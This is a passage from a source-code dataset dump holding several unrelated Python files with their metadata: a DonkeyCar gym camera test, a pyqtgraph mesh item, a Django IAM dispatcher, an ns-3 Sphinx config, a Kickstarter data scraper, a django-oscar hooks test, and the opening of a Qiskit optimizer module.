] | null | null | null |
""" Test the gym's code for configuring the DonkeyCar's camera settings.
"""
import os
import argparse
import gym
import gym_donkeycar
import numpy as np
import uuid
if __name__ == "__main__":
# Initialize the donkey environment
# where env_name one of:
env_list = [
"donkey-warehouse-v0",
"donkey-generated-roads-v0",
"donkey-avc-sparkfun-v0",
"donkey-generated-track-v0",
"donkey-roboracingleague-track-v0",
"donkey-waveshare-v0"
]
parser = argparse.ArgumentParser(description='gym_test')
parser.add_argument('--sim', type=str, default="sim_path",
help='path to unity simulator. maybe be left at default if you would like to start the sim on your own.')
parser.add_argument('--port', type=int, default=9091,
help='port to use for websockets')
parser.add_argument('--env_name', type=str, default='donkey-warehouse-v0',
help='name of donkey sim environment', choices=env_list)
args = parser.parse_args()
#%% SET UP ENVIRONMENT
cam = (256,256,3)
conf = {"exe_path" : args.sim,
"host" : "127.0.0.1",
"port" : args.port,
"body_style" : "donkey",
"body_rgb" : (128, 128, 128),
"car_name" : "me",
"font_size" : 100,
"racer_name" : "test",
"country" : "USA",
"bio" : "I am test client",
"guid" : str(uuid.uuid4()),
"cam_resolution" : cam,
"img_w" : cam[0],
"img_h" : cam[1],
"img_d" : cam[2],
}
env = gym.make(args.env_name, conf=conf)
print( "Env cam size: {}".format( env.viewer.get_sensor_size() ) )
speed = 0.5
steer = 0.0
max_steer = 1.0
#%% PLAY
obv = env.reset()
for t in range(100):
action = np.array([steer,speed]) # drive straight with small speed
try:
obv, reward, done, info = env.step(action)
except Exception as ex:
print( "Exception: {}".format( ex ) )
if obv.shape != cam:
print( "Invalid Image size: {}".format( obv.shape ) )
elif t == 10:
print( "Actual camera size: {}".format( obv.shape ) )
if done or (info['hit'] is True):
obv = env.reset()
print( "Exiting d/h: {}/{}".format( done, info['hit'] ) )
break
env.close()
| 27.953488
| 129
| 0.553245
|
import os
import argparse
import gym
import gym_donkeycar
import numpy as np
import uuid
if __name__ == "__main__":
env_list = [
"donkey-warehouse-v0",
"donkey-generated-roads-v0",
"donkey-avc-sparkfun-v0",
"donkey-generated-track-v0",
"donkey-roboracingleague-track-v0",
"donkey-waveshare-v0"
]
parser = argparse.ArgumentParser(description='gym_test')
parser.add_argument('--sim', type=str, default="sim_path",
help='path to unity simulator. maybe be left at default if you would like to start the sim on your own.')
parser.add_argument('--port', type=int, default=9091,
help='port to use for websockets')
parser.add_argument('--env_name', type=str, default='donkey-warehouse-v0',
help='name of donkey sim environment', choices=env_list)
args = parser.parse_args()
cam = (256,256,3)
conf = {"exe_path" : args.sim,
"host" : "127.0.0.1",
"port" : args.port,
"body_style" : "donkey",
"body_rgb" : (128, 128, 128),
"car_name" : "me",
"font_size" : 100,
"racer_name" : "test",
"country" : "USA",
"bio" : "I am test client",
"guid" : str(uuid.uuid4()),
"cam_resolution" : cam,
"img_w" : cam[0],
"img_h" : cam[1],
"img_d" : cam[2],
}
env = gym.make(args.env_name, conf=conf)
print( "Env cam size: {}".format( env.viewer.get_sensor_size() ) )
speed = 0.5
steer = 0.0
max_steer = 1.0
obv = env.reset()
for t in range(100):
action = np.array([steer,speed])
try:
obv, reward, done, info = env.step(action)
except Exception as ex:
print( "Exception: {}".format( ex ) )
if obv.shape != cam:
print( "Invalid Image size: {}".format( obv.shape ) )
elif t == 10:
print( "Actual camera size: {}".format( obv.shape ) )
if done or (info['hit'] is True):
obv = env.reset()
print( "Exiting d/h: {}/{}".format( done, info['hit'] ) )
break
env.close()
| true
| true
|
790c6760cbb5ba7a7d7f0f6662088b050841c907
| 2,274
|
py
|
Python
|
pyqtgraph/opengl/items/GLMeshItem.py
|
robertsj/poropy
|
481a604339c9fa797817b2b0a55448329685c1d8
|
[
"MIT"
] | 1
|
2018-02-11T11:24:14.000Z
|
2018-02-11T11:24:14.000Z
|
pyqtgraph/opengl/items/GLMeshItem.py
|
robertsj/poropy
|
481a604339c9fa797817b2b0a55448329685c1d8
|
[
"MIT"
] | 1
|
2018-06-12T16:15:31.000Z
|
2018-06-12T16:15:31.000Z
|
pyqtgraph/opengl/items/GLMeshItem.py
|
robertsj/poropy
|
481a604339c9fa797817b2b0a55448329685c1d8
|
[
"MIT"
] | 7
|
2015-03-27T16:58:07.000Z
|
2022-01-01T17:44:02.000Z
|
from OpenGL.GL import *
from .. GLGraphicsItem import GLGraphicsItem
from .. MeshData import MeshData
from pyqtgraph.Qt import QtGui
import pyqtgraph as pg
from .. import shaders
import numpy as np
__all__ = ['GLMeshItem']
class GLMeshItem(GLGraphicsItem):
"""
**Bases:** :class:`GLGraphicsItem <pyqtgraph.opengl.GLGraphicsItem>`
Displays a 3D triangle mesh.
"""
def __init__(self, faces, vertexes=None):
"""
See :class:`MeshData <pyqtgraph.opengl.MeshData>` for initialization arguments.
"""
if isinstance(faces, MeshData):
self.data = faces
else:
self.data = MeshData()
self.data.setFaces(faces, vertexes)
GLGraphicsItem.__init__(self)
def initializeGL(self):
self.shader = shaders.getShader('balloon')
l = glGenLists(1)
self.triList = l
glNewList(l, GL_COMPILE)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable( GL_BLEND )
glEnable( GL_ALPHA_TEST )
#glAlphaFunc( GL_ALWAYS,0.5 )
glEnable( GL_POINT_SMOOTH )
glDisable( GL_DEPTH_TEST )
glColor4f(1, 1, 1, .1)
glBegin( GL_TRIANGLES )
for face in self.data:
for (pos, norm, color) in face:
glColor4f(*color)
glNormal3f(norm.x(), norm.y(), norm.z())
glVertex3f(pos.x(), pos.y(), pos.z())
glEnd()
glEndList()
#l = glGenLists(1)
#self.meshList = l
#glNewList(l, GL_COMPILE)
#glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
#glEnable( GL_BLEND )
#glEnable( GL_ALPHA_TEST )
##glAlphaFunc( GL_ALWAYS,0.5 )
#glEnable( GL_POINT_SMOOTH )
#glEnable( GL_DEPTH_TEST )
#glColor4f(1, 1, 1, .3)
#glBegin( GL_LINES )
#for f in self.faces:
#for i in [0,1,2]:
#j = (i+1) % 3
#glVertex3f(*f[i])
#glVertex3f(*f[j])
#glEnd()
#glEndList()
def paint(self):
shaders.glUseProgram(self.shader)
glCallList(self.triList)
shaders.glUseProgram(0)
#glCallList(self.meshList)
| 28.78481
| 87
| 0.559367
|
from OpenGL.GL import *
from .. GLGraphicsItem import GLGraphicsItem
from .. MeshData import MeshData
from pyqtgraph.Qt import QtGui
import pyqtgraph as pg
from .. import shaders
import numpy as np
__all__ = ['GLMeshItem']
class GLMeshItem(GLGraphicsItem):
def __init__(self, faces, vertexes=None):
if isinstance(faces, MeshData):
self.data = faces
else:
self.data = MeshData()
self.data.setFaces(faces, vertexes)
GLGraphicsItem.__init__(self)
def initializeGL(self):
self.shader = shaders.getShader('balloon')
l = glGenLists(1)
self.triList = l
glNewList(l, GL_COMPILE)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable( GL_BLEND )
glEnable( GL_ALPHA_TEST )
glEnable( GL_POINT_SMOOTH )
glDisable( GL_DEPTH_TEST )
glColor4f(1, 1, 1, .1)
glBegin( GL_TRIANGLES )
for face in self.data:
for (pos, norm, color) in face:
glColor4f(*color)
glNormal3f(norm.x(), norm.y(), norm.z())
glVertex3f(pos.x(), pos.y(), pos.z())
glEnd()
glEndList()
def paint(self):
shaders.glUseProgram(self.shader)
glCallList(self.triList)
shaders.glUseProgram(0)
| true
| true
|
790c67d4a5356bd910dc789a418e8517e5910df9
| 3,052
|
py
|
Python
|
src/api/auth/bkiam/urls.py
|
Chromico/bk-base
|
be822d9bbee544a958bed4831348185a75604791
|
[
"MIT"
] | 84
|
2021-06-30T06:20:23.000Z
|
2022-03-22T03:05:49.000Z
|
src/api/auth/bkiam/urls.py
|
Chromico/bk-base
|
be822d9bbee544a958bed4831348185a75604791
|
[
"MIT"
] | 7
|
2021-06-30T06:21:16.000Z
|
2022-03-29T07:36:13.000Z
|
src/api/auth/bkiam/urls.py
|
Chromico/bk-base
|
be822d9bbee544a958bed4831348185a75604791
|
[
"MIT"
] | 40
|
2021-06-30T06:21:26.000Z
|
2022-03-29T12:42:26.000Z
|
# -*- coding: utf-8 -*
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.conf.urls import url
from iam.contrib.django.dispatcher.dispatchers import (
DjangoBasicResourceApiDispatcher,
success_response,
)
from iam.resource.utils import get_filter_obj, get_page_obj
from auth.bkiam import IAM_REGISTERED_SYSTEM
from auth.bkiam import resources
from auth.bkiam.backend import iam
from auth.bkiam.resources import BKDataResourceProvider
class BKDataDjangoBasicResourceApiDispatcher(DjangoBasicResourceApiDispatcher):
def _dispatch_search_instance(self, request, data, request_id):
options = self._get_options(request)
filter_obj = get_filter_obj(data.get("filter"), ["parent", "keyword"])
page_obj = get_page_obj(data.get("page"))
provider = self._provider[data["type"]]
pre_process = getattr(provider, "pre_search_instance", None)
if pre_process and callable(pre_process):
pre_process(filter_obj, page_obj, **options)
result = provider.list_instance(filter_obj, page_obj, **options)
return success_response(result.to_dict(), request_id)
def register_resources(dispatcher, resources_module):
for item in dir(resources):
if not item.endswith("ResourceProvider"):
continue
resource_class = getattr(resources_module, item)
if issubclass(resource_class, BKDataResourceProvider) and resource_class.resource_type is not None:
dispatcher.register(resource_class.resource_type, resource_class())
dispatcher = BKDataDjangoBasicResourceApiDispatcher(iam, IAM_REGISTERED_SYSTEM)
register_resources(dispatcher, resources)
urlpatterns = [url(r"^resource/api/v1/$", dispatcher.as_view([]), name="iamApi")]
| 44.882353
| 111
| 0.753277
|
from django.conf.urls import url
from iam.contrib.django.dispatcher.dispatchers import (
DjangoBasicResourceApiDispatcher,
success_response,
)
from iam.resource.utils import get_filter_obj, get_page_obj
from auth.bkiam import IAM_REGISTERED_SYSTEM
from auth.bkiam import resources
from auth.bkiam.backend import iam
from auth.bkiam.resources import BKDataResourceProvider
class BKDataDjangoBasicResourceApiDispatcher(DjangoBasicResourceApiDispatcher):
def _dispatch_search_instance(self, request, data, request_id):
options = self._get_options(request)
filter_obj = get_filter_obj(data.get("filter"), ["parent", "keyword"])
page_obj = get_page_obj(data.get("page"))
provider = self._provider[data["type"]]
pre_process = getattr(provider, "pre_search_instance", None)
if pre_process and callable(pre_process):
pre_process(filter_obj, page_obj, **options)
result = provider.list_instance(filter_obj, page_obj, **options)
return success_response(result.to_dict(), request_id)
def register_resources(dispatcher, resources_module):
for item in dir(resources):
if not item.endswith("ResourceProvider"):
continue
resource_class = getattr(resources_module, item)
if issubclass(resource_class, BKDataResourceProvider) and resource_class.resource_type is not None:
dispatcher.register(resource_class.resource_type, resource_class())
dispatcher = BKDataDjangoBasicResourceApiDispatcher(iam, IAM_REGISTERED_SYSTEM)
register_resources(dispatcher, resources)
urlpatterns = [url(r"^resource/api/v1/$", dispatcher.as_view([]), name="iamApi")]
| true
| true
|
790c68773133933418a5d386eacb3bbd8b661688
| 7,002
|
py
|
Python
|
ns-3-dev/doc/models/source/conf.py
|
maxvonhippel/snake
|
0805773dc34e1480dffaae40174aa1f82d1c6ce8
|
[
"BSD-3-Clause"
] | 11
|
2015-11-24T11:07:28.000Z
|
2021-12-23T04:10:29.000Z
|
ns-3-dev/doc/models/source/conf.py
|
maxvonhippel/snake
|
0805773dc34e1480dffaae40174aa1f82d1c6ce8
|
[
"BSD-3-Clause"
] | null | null | null |
ns-3-dev/doc/models/source/conf.py
|
maxvonhippel/snake
|
0805773dc34e1480dffaae40174aa1f82d1c6ce8
|
[
"BSD-3-Clause"
] | 6
|
2016-03-01T06:32:21.000Z
|
2022-03-24T19:31:41.000Z
|
# -*- coding: utf-8 -*-
#
# ns-3 documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 14 09:00:39 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ns-3'
copyright = u'2011, ns-3 project'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'ns-3-dev'
# The full version, including alpha/beta/rc tags.
release = 'ns-3-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ns-3doc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ns-3-model-library.tex', u'ns-3 Model Library',
u'ns-3 project', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ns-3-model-library', u'ns-3 Model Library',
[u'ns-3 project'], 1)
]
| 32.267281
| 80
| 0.716938
|
import sys, os
extensions = ['sphinx.ext.pngmath']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'ns-3'
copyright = u'2011, ns-3 project'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'ns-3-dev'
# The full version, including alpha/beta/rc tags.
release = 'ns-3-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ns-3doc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ns-3-model-library.tex', u'ns-3 Model Library',
u'ns-3 project', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ns-3-model-library', u'ns-3 Model Library',
[u'ns-3 project'], 1)
]
| true
| true
|
790c69b6b006c6113255c1134a1cd5745849694b
| 1,706
|
py
|
Python
|
scripts/processing_scripts/raw_scrape_processing.py
|
sai-krishna-msk/KickAssist
|
7fb256e3ef4beff231332f6491ebb975f3fe4b43
|
[
"MIT"
] | null | null | null |
scripts/processing_scripts/raw_scrape_processing.py
|
sai-krishna-msk/KickAssist
|
7fb256e3ef4beff231332f6491ebb975f3fe4b43
|
[
"MIT"
] | 7
|
2021-06-08T21:18:49.000Z
|
2022-03-12T00:24:33.000Z
|
scripts/processing_scripts/raw_scrape_processing.py
|
sai-krishna-msk/KickAssist
|
7fb256e3ef4beff231332f6491ebb975f3fe4b43
|
[
"MIT"
] | null | null | null |
import os
import sys
path = os.getcwd()
package_path = (os.path.abspath(os.path.join(path, os.pardir))).replace('\\', '/')+'/'
sys.path.insert(1, package_path)
from config.config import *
##############################################Scrape-1###################################################
def contains(text, subtext):
    """Return True if *subtext* occurs anywhere inside *text*, else False.

    Idiomatic replacement for the original if/return-True/return-False form;
    the `in` operator already yields the needed boolean.
    """
    return subtext in text
def get_scrape_url(url):
    """Fetch *url* and return (archive_url, file_name) for the first link that
    points at an S3-hosted .zip Kickstarter archive.

    The response encoding is taken from the HTML's declared encoding when
    present, otherwise from the HTTP content-type charset.

    Raises:
        Exception: if the page contains no matching archive link.
    """
    resp = requests.get(url)
    http_encoding = resp.encoding if 'charset' in resp.headers.get('content-type', '').lower() else None
    html_encoding = EncodingDetector.find_declared_encoding(resp.content, is_html=True)
    encoding = html_encoding or http_encoding
    # Pass an explicit parser; the original relied on bs4 guessing one, which
    # is non-deterministic across installs and emits a warning.
    soup = BeautifulSoup(resp.content, "html.parser", from_encoding=encoding)
    scrape_url = None
    for link in soup.find_all('a', href=True):
        candidate = str(link['href'])
        if contains(candidate, "s3.amazonaws.com") and contains(candidate, ".zip"):
            scrape_url = candidate
            break
    # Original bug: if no link matched, `scrape_url` was either unbound
    # (NameError when the page has no links) or silently held the *last*
    # non-matching href; fail loudly instead.
    if scrape_url is None:
        raise Exception("No s3.amazonaws.com .zip archive link found at {}".format(url))
    file_name = scrape_url.split("/Kickstarter/")[1]
    return scrape_url, file_name
def download(scrape_url, output_directory):
    """Download *scrape_url* into *output_directory* using wget.

    Returns:
        The output_directory that was passed in (kept for caller compatibility).

    Raises:
        Exception: if the download fails; the underlying error is chained so
        the cause is not lost (the original bare `except` discarded it).
    """
    try:
        wget.download(scrape_url, out=output_directory)
    except Exception as err:
        raise Exception("Failed in downloading the data file: {}".format(err)) from err
    return output_directory
def unzip_data(input_file_path, output_directory):
    """Extract the zip archive at *input_file_path* into *output_directory*,
    then delete the archive file.

    Returns:
        True on success.

    Raises:
        Exception: if extraction fails. Original bug: the message used
        `"...{}",format(e)` (comma instead of dot), so the placeholder was
        never interpolated and Exception received two arguments; fixed to a
        proper `.format(e)` call with the cause chained.
    """
    try:
        with zipfile.ZipFile(input_file_path, 'r') as zip_ref:
            zip_ref.extractall(output_directory)
    except Exception as e:
        raise Exception("Failed to unzip the data folder !+....{}".format(e)) from e
    os.remove(input_file_path)
    return True
###################################scrape-1ends############################################################
| 34.12
| 107
| 0.611958
|
import os
import sys
path = os.getcwd()
package_path = (os.path.abspath(os.path.join(path, os.pardir))).replace('\\', '/')+'/'
sys.path.insert(1, package_path)
from config.config import *
| true
| true
|
790c6a37e8a5d4de2bc90959adfbdcde3b8e33e3
| 1,317
|
py
|
Python
|
tests/functional/dashboard/test_hook.py
|
cage1016/django-oscar-hooks
|
3dc6fedb1cccc7ad0a120c609599ee418b17f9d9
|
[
"BSD-3-Clause"
] | 3
|
2016-06-01T22:58:39.000Z
|
2021-02-08T04:14:14.000Z
|
tests/functional/dashboard/test_hook.py
|
cage1016/django-oscar-hooks
|
3dc6fedb1cccc7ad0a120c609599ee418b17f9d9
|
[
"BSD-3-Clause"
] | 2
|
2020-04-15T08:26:50.000Z
|
2020-05-31T19:28:06.000Z
|
tests/functional/dashboard/test_hook.py
|
cage1016/django-oscar-hooks
|
3dc6fedb1cccc7ad0a120c609599ee418b17f9d9
|
[
"BSD-3-Clause"
] | null | null | null |
from django.core.urlresolvers import reverse
from oscar.core.loading import get_model
from oscar.test.testcases import WebTestCase, add_permissions
from oscar.test.factories import (
CategoryFactory, PartnerFactory, ProductFactory, ProductAttributeFactory)
from hooks.test.factories import (
HookEventFactory, HookFactory
)
ProductClass = get_model('catalogue', 'ProductClass')
Hook = get_model('hooks', 'Hook')
class TestAStaffUser(WebTestCase):
    """Functional test: a staff user creates a Hook (with one inline HookEvent)
    through the dashboard's hook-create form."""
    # WebTestCase logs the test client in as a staff member when this is set.
    is_staff = True
    def setUp(self):
        super(TestAStaffUser, self).setUp()
        # A partner record is created up front; presumably required by the
        # dashboard views/fixtures -- confirm against WebTestCase setup.
        self.partner = PartnerFactory()
    def test_can_create_hook_with_hook_event(self):
        # Factories pre-build one HookEvent (for realistic field values) and
        # one Hook (counted in the final assertion).
        hookevent = HookEventFactory()
        hook = HookFactory()
        product_class = ProductClass.objects.create(name="Book")
        # Load the creation form for the new product class and fill the
        # inline hookevent formset's first row.
        page = self.get(reverse('hook-create', kwargs={"hook_class_slug": product_class.slug}))
        form = page.form
        form["name"] = u'books'
        form["description"] = u'this is description'
        form["hookevent_set-0-id"] = hook
        form["hookevent_set-0-signal_type"] = hookevent.signal_type
        form["hookevent_set-0-URL"] = hookevent.URL
        form["hookevent_set-0-extra_headers"] = hookevent.extra_headers
        response = form.submit(name='action', value='save')
        # One Hook from HookFactory above plus one created by the form submit.
        assert Hook.objects.count() == 2
| 32.121951
| 95
| 0.699317
|
from django.core.urlresolvers import reverse
from oscar.core.loading import get_model
from oscar.test.testcases import WebTestCase, add_permissions
from oscar.test.factories import (
CategoryFactory, PartnerFactory, ProductFactory, ProductAttributeFactory)
from hooks.test.factories import (
HookEventFactory, HookFactory
)
ProductClass = get_model('catalogue', 'ProductClass')
Hook = get_model('hooks', 'Hook')
class TestAStaffUser(WebTestCase):
is_staff = True
def setUp(self):
super(TestAStaffUser, self).setUp()
self.partner = PartnerFactory()
def test_can_create_hook_with_hook_event(self):
hookevent = HookEventFactory()
hook = HookFactory()
product_class = ProductClass.objects.create(name="Book")
page = self.get(reverse('hook-create', kwargs={"hook_class_slug": product_class.slug}))
form = page.form
form["name"] = u'books'
form["description"] = u'this is description'
form["hookevent_set-0-id"] = hook
form["hookevent_set-0-signal_type"] = hookevent.signal_type
form["hookevent_set-0-URL"] = hookevent.URL
form["hookevent_set-0-extra_headers"] = hookevent.extra_headers
response = form.submit(name='action', value='save')
assert Hook.objects.count() == 2
| true
| true
|
790c6b9006ec8858bb51f19dce28a4f5869a97fe
| 13,424
|
py
|
Python
|
qiskit/optimization/algorithms/recursive_minimum_eigen_optimizer.py
|
Cristian-Malinescu/qiskit-aqua
|
b29596800447c3130a20ec72a18b7fd8ed9fdb2f
|
[
"Apache-2.0"
] | null | null | null |
qiskit/optimization/algorithms/recursive_minimum_eigen_optimizer.py
|
Cristian-Malinescu/qiskit-aqua
|
b29596800447c3130a20ec72a18b7fd8ed9fdb2f
|
[
"Apache-2.0"
] | null | null | null |
qiskit/optimization/algorithms/recursive_minimum_eigen_optimizer.py
|
Cristian-Malinescu/qiskit-aqua
|
b29596800447c3130a20ec72a18b7fd8ed9fdb2f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""A recursive minimal eigen optimizer in Qiskit's optimization module."""
from copy import deepcopy
from enum import Enum
from typing import Optional, Union, List, Tuple, Dict
import logging
import numpy as np
from qiskit.aqua.algorithms import NumPyMinimumEigensolver
from qiskit.aqua.utils.validation import validate_min
